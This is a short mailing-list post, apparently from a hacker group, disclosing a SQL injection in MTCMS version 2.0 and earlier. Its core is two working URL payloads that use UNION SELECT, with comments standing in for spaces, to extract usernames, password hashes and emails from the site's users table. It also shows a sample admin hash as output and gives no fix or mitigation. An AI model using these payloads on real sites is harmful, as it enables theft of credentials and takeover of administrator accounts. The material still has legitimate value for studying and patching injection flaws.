[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MTCMS <=2.0 SQL Injection Vulnerbility



            
			 ########################################################################
             #                                                                      #
             #    ...:::::MTCMS <=2.0  SQL Injection Vulnerbility ::::....           #           
             ########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By :hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
----------
vules:
http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*
http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*

-------------------------------------
you can see somting such as:
#admin_35a6e23edefc651ef0380b277ce5d709#
Admin@xxxxxxxxxxx
-------------------------------------
MTCMS contains of other bugs in other pages ;)
& maybe other versions have Vulnerbility too :)